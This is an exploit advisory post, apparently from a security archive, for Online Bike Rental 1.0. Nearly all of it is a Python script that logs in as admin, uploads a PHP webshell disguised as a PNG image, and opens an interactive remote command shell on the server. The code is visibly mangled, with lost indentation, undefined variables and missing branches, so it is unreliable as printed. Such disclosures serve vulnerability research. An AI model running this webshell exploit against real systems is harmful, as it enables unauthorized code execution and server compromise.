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Online Bike Rental 1.0 Shell Upload

Online Bike Rental 1.0 Shell Upload
Posted Aug 1, 2020
Authored by Bobby Cooke, hyd3sec

Online Bike Rental version 1.0 suffers from an authenticated remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 3df5a1467fc3909370ba828c15f93e72b4265fd87271aa821233dcccaae9f382

Online Bike Rental 1.0 Shell Upload

Change Mirror Download
# Exploit Title: Online Bike Rental 1.0 - Authenticated Remote Code Execution
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# Vulnerability Discovery: Adeeb Shah (@hyd3sec)
# Date: 2020-07-31
# Vendor Homepage: ttps://www.sourcecodester.com/php/14374/online-bike-rental-phpmysql.html
# Software Link: ttps://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/bikerental-php.zip
# Version: 1.0
# CWE-434: Unrestricted Upload of File with Dangerous Type
# Overall CVSS Score: 7.2
# CVSS Base Score: 9.1 | Impact Subscore: 6.0 | Exploitability Subscore: 2.3
# CVSS Temporal Score: 8.9 | CVSS Environmental Score: 7.2 | Modified Impact Subscore: 4.5
# Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7
# Vulnerability Description:
# Online Bike Rental v1.0 suffers from an authenticated file upload vulnerability allowing remote attackers
# to gain remote code execution (RCE) on the hosting webserver via uploading a maliciously crafted image.

import requests, sys, re
from colorama import Fore, Back, Style
#proxies = {'http':'','https':''}
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
info = S[3]+F[5]+'['+S[0]+S[3]+'-'+S[3]+F[5]+']'+S[0]+' '
err = S[3]+F[2]+'['+S[0]+S[3]+'!'+S[3]+F[2]+']'+S[0]+' '
ok = S[3]+F[3]+'['+S[0]+S[3]+'+'+S[3]+F[3]+']'+S[0]+' '

def webshell(SERVER_URL, WEBSHELL_PATH, session):
print(info+"Webshell URL: "+ WEB_SHELL)
getdir = {'s33k': 'echo %CD%'}
req = session.post(url=WEB_SHELL, data=getdir, verify=False)
status = req.status_code
if status != 200:
print(err+"Could not connect to the webshell.")
print(ok+'Successfully connected to webshell.')
cwd = re.findall('[CDEF].*', req.text)
cwd = cwd[0]+"> "
term = S[3]+F[3]+cwd+F[0]
print(S[1]+F[2]+')'+F[4]+'+++++'+F[2]+'['+F[0]+'=========>'+S[0]+S[3]+' hyd3sec & boku '+S[0]+S[1]+'<========'+F[2]+']'+F[4]+'+++++'+F[2]+'('+F[0]+S[0])
while True:
cmd = raw_input(term)
command = {'s33k': cmd}
req = requests.post(WEB_SHELL, data=command, verify=False)
status = req.status_code
if status != 200:
resp= req.text
print('\r\n'+err+'Webshell session failed. Quitting.')

def SIG():
SIG = S[1]+" ,(&@@@@* ,@@@@@@%( \n"
SIG += " &@@@@@@@@@@@@@@@& @@@@@@@@@@@@@( \n"
SIG += " *@@@@@@@@@@@@%@@@@@@ ,, `''@@@/ ,@@ \n"
SIG += " @@@@@@@@@# /@@@@@@ #@@@@@@@@@&. * /@@@@@@ \n"
SIG += " @@(@@@@@ /@@@@@@ @@@@@@@@@@@@@@@` @@@@@@ @@ \n"
SIG += " @@ , @@@@@@@@ #@@@@@@@@@@@@@@ &@@@ %@.\n"
SIG += " @@ %@@@@@@@@@@ %@@@@@@@@@@@@@@. /@#\n"
SIG += " %@ /@@@@@@@@@@ &@@@@@@@@@@ &@ \n"
SIG += " @@ # ...*&@@@@@@@@@@@* @@ \n"
SIG += " ,&@@@@& /@@@@"+S[0]+S[3]+"@hyd3sec"+S[0]+S[1]+"@@@@@ (@@@@@% \n"
SIG += " @@@@ (@@%@@@@@@@@@/@@ *@@@% \n"
SIG += " @@@@@@,*@@@@@ %@@@@@@ \n"
SIG += " @@@@@# @ @@@@@% "+S[0]+S[3]+F[4]+" .-----.._ ,--."+S[0]+S[1]+"\n"
SIG += " &@@@@@ @@@@@ "+S[0]+S[3]+F[4]+" | .. > ___ | | .--."+S[0]+S[1]+"\n"
SIG += " @@@@@@ @@@@@* "+S[1]+" # "+S[0]+S[3]+F[4]+" | |.' ,'-\" \"-. |/ /__ __\n"+S[0]+S[1]+""
SIG += " (@@@@@@@@@@@ "+S[1]+" ##### "+S[0]+S[3]+F[4]+" | < "+F[2]+" * *"+F[4]+" \ / \\/ \\\n"+S[0]+S[1]+""
SIG += " @@&%@@@ @@@ "+S[1]+" # "+S[0]+S[3]+F[4]+" | |> )"+F[2]+" * * *"+F[4]+" / \\ \\\n"+S[0]+S[1]+""
SIG += " @@( @@ @@ "+S[0]+S[3]+F[4]+" |____..- '-."+F[2]+"*"+F[4]+"_"+F[2]+"*"+F[4]+".-'_|\\___|._..\\___\\\n"+S[0]+S[1]+""
SIG += " &* & @ "+S[0]+S[3]+F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0]
return SIG

def formatHelp(STRING):
return S[3]+F[2]+STRING+S[0]

def header():
head = S[3]+F[2]+' --- Online Bike Rental 1.0 - Authenticated Remote Code Execution (RCE) ---\n'+S[0]
return head

if __name__ == "__main__":
#1 | INIT
if len(sys.argv) != 4:
print(err+formatHelp("Usage:\t python %s <WEBAPP_URL> <USERNAME> <PASSWORD>" % sys.argv[0]))
print(err+formatHelp("Example:\t python %s '' 'admin' 'Test@12345'" % sys.argv[0]))
# python CLI Arguments
SERVER_URL = sys.argv[1]
USERNAME = sys.argv[2]
PASSWORD = sys.argv[3]
# Make sure that URL has a / at end
if not re.match(r".*/$", SERVER_URL):
# URLs
LOGIN_URL = SERVER_URL + 'admin/index.php'
UPLOAD_URL = SERVER_URL + 'admin/changeimage1.php?imgid=1'

#2 | Create Session
# Create a web session in python
s = requests.Session()
# GET request to webserver - Start a session & retrieve a session cookie
get_session = s.get(LOGIN_URL, verify=False)
# Check connection to website & print session cookie to terminal OR die
if get_session.status_code == 200:
print(ok+'Successfully connected to Bike Rental PHP server & created session.')
print(info+"Session Cookie: " + get_session.headers['Set-Cookie'])
print(err+'Cannot connect to the server and create a web session.')
# POST data to login with known admin creds
login_data = {'username':USERNAME, 'password':PASSWORD,'login':''}
print(info+"Attempting to Login to Bike Rental with credentials: "+USERNAME+":"+PASSWORD)
#auth = s.post(url=LOGIN_URL, data=login_data, verify=False, proxies=proxies)
auth = s.post(url=LOGIN_URL, data=login_data, verify=False)
loginchk = str(re.findall(r'change-password.php', auth.text))
# print(loginchk) # Debug - search login response for successful login
if loginchk == "[u'change-password.php']":
print(ok+"Login successful.")
print(err+"Failed login. Check credentials.")

#3 | File Upload
PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
# Content-Disposition: form-data; name="img1"; filename="hyd3.php"
# Content-Type: image/png
websh = {
PNG_magicBytes+'\n'+'<?php echo shell_exec($_REQUEST["s33k"]); ?>',
{'Content-Disposition': 'form-data'}
fdata = {'update':''}
print(info+"Exploiting bike image file upload vulnerability to upload a PHP webshell")
#upload_bike = s.post(url=UPLOAD_URL, files=websh, data=fdata, verify=False, proxies=proxies)
upload_bike = s.post(url=UPLOAD_URL, files=websh, data=fdata, verify=False)

#4 | Get Webshell Upload Name
uploadchk = re.findall(r'img/vehicleimages/hyd3.php', upload_bike.text)
uploadchk = uploadchk[0]
# print(uploadchk) # Debug - Find webshell file upload in response
if uploadchk == "img/vehicleimages/hyd3.php":
print(ok+"Successfully uploaded webshell")
print(err+"Webshell upload failed.")
webshPath = 'admin/' + uploadchk
print(info+"Webshell Filename: " + webshPath)

#5 | interact with webshell for Remote Command Execution
webshell(SERVER_URL, webshPath, s)
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